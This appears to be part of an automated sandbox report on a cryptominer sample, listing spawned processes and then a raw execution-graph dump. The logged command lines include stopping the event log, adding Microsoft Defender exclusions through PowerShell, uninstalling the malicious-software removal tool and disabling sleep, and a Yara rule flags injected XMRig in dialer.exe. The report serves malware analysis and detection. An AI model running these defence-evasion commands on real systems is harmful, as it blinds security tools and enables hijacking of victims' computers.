                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe start "LightService"
                                                                              Imagebase:0x7ff6b45e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:25
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:26
                                                                              Start time:16:58:09
                                                                              Start date:04/01/2025
                                                                              Path:C:\ProgramData\IGaming\driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\IGaming\driver.exe
                                                                              Imagebase:0x7ff7f4f20000
                                                                              File size:2'867'712 bytes
                                                                              MD5 hash:A03484846E3418FFA2AB8AEC97A03E88
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 82%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:27
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff654c90000
                                                                              File size:59'456 bytes
                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:28
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:30
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:31
                                                                              Start time:16:58:10
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"dwm.exe"
                                                                              Imagebase:0x7ff79d4a0000
                                                                              File size:94'720 bytes
                                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:32
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff7caad0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:33
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:34
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:35
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:36
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:37
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff71a810000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:39
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:41
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:42
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:43
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:44
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:45
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              Target ID:46
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:47
                                                                              Start time:16:58:13
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:48
                                                                              Start time:16:58:13
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:49
                                                                              Start time:16:58:13
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:50
                                                                              Start time:16:58:14
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:51
                                                                              Start time:16:58:15
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:52
                                                                              Start time:16:58:15
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:53
                                                                              Start time:16:58:16
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:54
                                                                              Start time:16:58:17
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:55
                                                                              Start time:16:58:17
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:56
                                                                              Start time:16:58:17
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:57
                                                                              Start time:16:58:18
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:58
                                                                              Start time:16:58:18
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:59
                                                                              Start time:16:58:18
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false


                                                                                Execution Graph

                                                                                Execution Coverage:3.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:10.2%
                                                                                Total number of Nodes:1950
                                                                                Total number of Limit Nodes:2
3320->3314 3320->3318 3321->3314 3321->3320 4220 7ff749f41394 3322->4220 3324 7ff749f4154e 3325 7ff749f41394 2 API calls 3324->3325 3326 7ff749f41558 3325->3326 3327 7ff749f4155d 3326->3327 3328 7ff749f41394 2 API calls 3326->3328 3329 7ff749f41394 2 API calls 3327->3329 3328->3327 3330 7ff749f41567 3329->3330 3331 7ff749f4156c 3330->3331 3332 7ff749f41394 2 API calls 3330->3332 3333 7ff749f41394 2 API calls 3331->3333 3332->3331 3334 7ff749f41576 3333->3334 3335 7ff749f4157b 3334->3335 3336 7ff749f41394 2 API calls 3334->3336 3337 7ff749f41394 2 API calls 3335->3337 3336->3335 3338 7ff749f41585 3337->3338 3339 7ff749f4158a 3338->3339 3340 7ff749f41394 2 API calls 3338->3340 3341 7ff749f41394 2 API calls 3339->3341 3340->3339 3342 7ff749f41599 3341->3342 3343 7ff749f41394 2 API calls 3342->3343 3344 7ff749f415a3 3343->3344 3345 7ff749f415a8 3344->3345 3346 7ff749f41394 2 API calls 3344->3346 3347 7ff749f41394 2 API calls 3345->3347 3346->3345 3348 7ff749f415b7 3347->3348 3349 7ff749f41394 2 API calls 3348->3349 3350 7ff749f415c1 3349->3350 3351 7ff749f415c6 3350->3351 3352 7ff749f41394 2 API calls 3350->3352 3353 7ff749f41394 2 API calls 3351->3353 3352->3351 3354 7ff749f415d0 3353->3354 3355 7ff749f415d5 3354->3355 3356 7ff749f41394 2 API calls 3354->3356 3357 7ff749f41394 2 API calls 3355->3357 3356->3355 3358 7ff749f415df 3357->3358 3359 7ff749f415e4 3358->3359 3360 7ff749f41394 2 API calls 3358->3360 3361 7ff749f41394 2 API calls 3359->3361 3360->3359 3362 7ff749f415f3 3361->3362 3362->3294 3363 7ff749f41503 3362->3363 3364 7ff749f41394 2 API calls 3363->3364 3365 7ff749f41512 3364->3365 3366 7ff749f41394 2 API calls 3365->3366 3367 7ff749f41521 3366->3367 3368 7ff749f41530 3367->3368 3369 7ff749f41394 2 API calls 3367->3369 3370 7ff749f41394 2 API calls 3368->3370 3369->3368 3371 7ff749f4153a 3370->3371 3372 7ff749f4153f 3371->3372 3373 7ff749f41394 2 API calls 3371->3373 3374 7ff749f41394 2 API calls 3372->3374 3373->3372 3375 7ff749f4154e 3374->3375 3376 
7ff749f41394 2 API calls 3375->3376 3377 7ff749f41558 3376->3377 3378 7ff749f4155d 3377->3378 3379 7ff749f41394 2 API calls 3377->3379 3380 7ff749f41394 2 API calls 3378->3380 3379->3378 3381 7ff749f41567 3380->3381 3382 7ff749f4156c 3381->3382 3383 7ff749f41394 2 API calls 3381->3383 3384 7ff749f41394 2 API calls 3382->3384 3383->3382 3385 7ff749f41576 3384->3385 3386 7ff749f4157b 3385->3386 3387 7ff749f41394 2 API calls 3385->3387 3388 7ff749f41394 2 API calls 3386->3388 3387->3386 3389 7ff749f41585 3388->3389 3390 7ff749f4158a 3389->3390 3391 7ff749f41394 2 API calls 3389->3391 3392 7ff749f41394 2 API calls 3390->3392 3391->3390 3393 7ff749f41599 3392->3393 3394 7ff749f41394 2 API calls 3393->3394 3395 7ff749f415a3 3394->3395 3396 7ff749f415a8 3395->3396 3397 7ff749f41394 2 API calls 3395->3397 3398 7ff749f41394 2 API calls 3396->3398 3397->3396 3399 7ff749f415b7 3398->3399 3400 7ff749f41394 2 API calls 3399->3400 3401 7ff749f415c1 3400->3401 3402 7ff749f415c6 3401->3402 3403 7ff749f41394 2 API calls 3401->3403 3404 7ff749f41394 2 API calls 3402->3404 3403->3402 3405 7ff749f415d0 3404->3405 3406 7ff749f415d5 3405->3406 3407 7ff749f41394 2 API calls 3405->3407 3408 7ff749f41394 2 API calls 3406->3408 3407->3406 3409 7ff749f415df 3408->3409 3410 7ff749f415e4 3409->3410 3411 7ff749f41394 2 API calls 3409->3411 3412 7ff749f41394 2 API calls 3410->3412 3411->3410 3413 7ff749f415f3 3412->3413 3413->3131 3414 7ff749f4156c 3413->3414 3415 7ff749f41394 2 API calls 3414->3415 3416 7ff749f41576 3415->3416 3417 7ff749f4157b 3416->3417 3418 7ff749f41394 2 API calls 3416->3418 3419 7ff749f41394 2 API calls 3417->3419 3418->3417 3420 7ff749f41585 3419->3420 3421 7ff749f4158a 3420->3421 3422 7ff749f41394 2 API calls 3420->3422 3423 7ff749f41394 2 API calls 3421->3423 3422->3421 3424 7ff749f41599 3423->3424 3425 7ff749f41394 2 API calls 3424->3425 3426 7ff749f415a3 3425->3426 3427 7ff749f415a8 3426->3427 3428 7ff749f41394 2 API calls 3426->3428 3429 7ff749f41394 2 API calls 
3427->3429 3428->3427 3430 7ff749f415b7 3429->3430 3431 7ff749f41394 2 API calls 3430->3431 3432 7ff749f415c1 3431->3432 3433 7ff749f415c6 3432->3433 3434 7ff749f41394 2 API calls 3432->3434 3435 7ff749f41394 2 API calls 3433->3435 3434->3433 3436 7ff749f415d0 3435->3436 3437 7ff749f415d5 3436->3437 3438 7ff749f41394 2 API calls 3436->3438 3439 7ff749f41394 2 API calls 3437->3439 3438->3437 3440 7ff749f415df 3439->3440 3441 7ff749f415e4 3440->3441 3442 7ff749f41394 2 API calls 3440->3442 3443 7ff749f41394 2 API calls 3441->3443 3442->3441 3444 7ff749f415f3 3443->3444 3444->3131 3445 7ff749f4145e 3444->3445 3446 7ff749f41394 2 API calls 3445->3446 3447 7ff749f41468 3446->3447 3448 7ff749f4146d 3447->3448 3449 7ff749f41394 2 API calls 3447->3449 3450 7ff749f41394 2 API calls 3448->3450 3449->3448 3451 7ff749f41477 3450->3451 3452 7ff749f4147c 3451->3452 3453 7ff749f41394 2 API calls 3451->3453 3454 7ff749f41394 2 API calls 3452->3454 3453->3452 3455 7ff749f41486 3454->3455 3456 7ff749f4148b 3455->3456 3457 7ff749f41394 2 API calls 3455->3457 3458 7ff749f41394 2 API calls 3456->3458 3457->3456 3459 7ff749f41495 3458->3459 3460 7ff749f4149a 3459->3460 3461 7ff749f41394 2 API calls 3459->3461 3462 7ff749f41394 2 API calls 3460->3462 3461->3460 3463 7ff749f414a4 3462->3463 3464 7ff749f414a9 3463->3464 3465 7ff749f41394 2 API calls 3463->3465 3466 7ff749f41394 2 API calls 3464->3466 3465->3464 3467 7ff749f414b3 3466->3467 3468 7ff749f414b8 3467->3468 3469 7ff749f41394 2 API calls 3467->3469 3470 7ff749f41394 2 API calls 3468->3470 3469->3468 3471 7ff749f414c2 3470->3471 3472 7ff749f414c7 3471->3472 3473 7ff749f41394 2 API calls 3471->3473 3474 7ff749f41394 2 API calls 3472->3474 3473->3472 3475 7ff749f414d1 3474->3475 3476 7ff749f414d6 3475->3476 3477 7ff749f41394 2 API calls 3475->3477 3478 7ff749f41394 2 API calls 3476->3478 3477->3476 3479 7ff749f414e0 3478->3479 3480 7ff749f414e5 3479->3480 3481 7ff749f41394 2 API calls 3479->3481 3482 7ff749f41394 2 API calls 
